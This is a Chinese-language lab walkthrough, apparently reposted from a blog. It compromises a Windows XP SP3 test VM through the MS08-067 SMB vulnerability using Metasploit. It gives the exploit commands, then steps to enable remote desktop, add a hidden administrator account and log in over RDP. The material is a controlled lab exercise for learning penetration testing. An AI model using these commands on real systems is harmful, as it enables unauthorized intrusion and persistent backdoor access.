ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

Defense:综合攻防渗透实验

2020-12-23 13:01:06  阅读:293  来源: 互联网

标签:攻防 postgresql 查看 漏洞 渗透 Windows Defense 设置 net


实验环境

Windows XP SP3

IP:172.16.211.129

百度网盘:https://pan.baidu.com/s/1dbBGdkM6aDzXcKajV47zBw     靶机环境

 

Kali Linux 2.0

IP:172.16.211.128

实验原理

漏洞名称:Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)此安全更新解决了服务器服务中一个秘密报告的漏洞。如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。

在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。

防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。

Kali 启动metasploit服务

 kali linux 2.0 本身已内置metasploit,kali 2.0 已经没有metasploit 这个服务了,所以service metasploit start 的方式不起作用。

kali 2.0中启动带数据库支持的msf方式

#首先启动postgresql数据库
/etc/init.d/postgresql start;
或者 
service postgresql start;

#初始化MSF数据库(关键步骤!)
msfdb init;

#运行msfconsole
msfconsole;

#在msf中查看数据库连接状态
db_status

#将postgresql数据库设置开机自启
update-rc.d postgresql enable

 

 漏洞利用过程

在msfconsole使用 search 命令搜索MS08067漏洞攻击程序

 

从结果中得到  exploit/windows/smb/ms08_067_netapi

表示当前msf框架中包含MS08067漏洞的攻击插件。

 

使用use命令调用MS08067漏洞攻击程序

#进入msf的交互式命令窗口
use exploit/windows/smb/ms08_067_netapi

 

查看需要设置的选项

#查看设置选项
show options


 

从图中可以看到还需设置RHOST(目标地址)、Exploit target(攻击目标)

 

使用 set 命令设置 Module Options

#设置目标IP即 
set rhost 172.16.211.129

使用show options 命令查看设置情况

从中可以看出目标IP已经设置好了,接着设置Exploit target,使用show targets 查看可选项可以看出以下版本的系统均存在此漏洞。

因为实例演示的XP系统为WinXP SP3 简体中文版对应的编号为34

 

使用set target 命令设置目标

#设置目标
set target 34

 

使用exploit 或者 run 命令进行攻击

#进行攻击
exploit 
或者
run

执行命令后得到一个meterpreter命令行交互窗口

 

打开RDP(远程桌面)服务

#打开远程服务 端口3389(meterpreter命令行交互窗口执行命令)
run getgui -e

 

进入CMD窗口

#进入cmd窗口
shell

 

在cmd命令下也可以通过添加注册表项的方式开启对方远程桌面服务(如果上面已经开启了,这步可以省略)。

#开启远程服务
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections" /t REG_DWORD /d 00000000 /f

 

查看端口是否开放

#查看端口状态
netstat -ano

 

查看XP系统中的用户

#查看系统中用户
net user

 

添加账户和管理员权限

#添加用户
格式一
net user user pass /add   
例如:net user gao 123 /add

格式二
net localgroup administrators /add  
例如:net localgroup administrators gao /add  

 

用本机Ka li 远程访问目标主机(利用新建的用户)

rdesktop -a 32 -u gao -p 123 172.16.211.129:3389

 

完成Windows XP SP3系统侵入!!

 

 

 

 

 

 

标签:攻防,postgresql,查看,漏洞,渗透,Windows,Defense,设置,net
来源: https://www.cnblogs.com/nhdlb/p/14178026.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有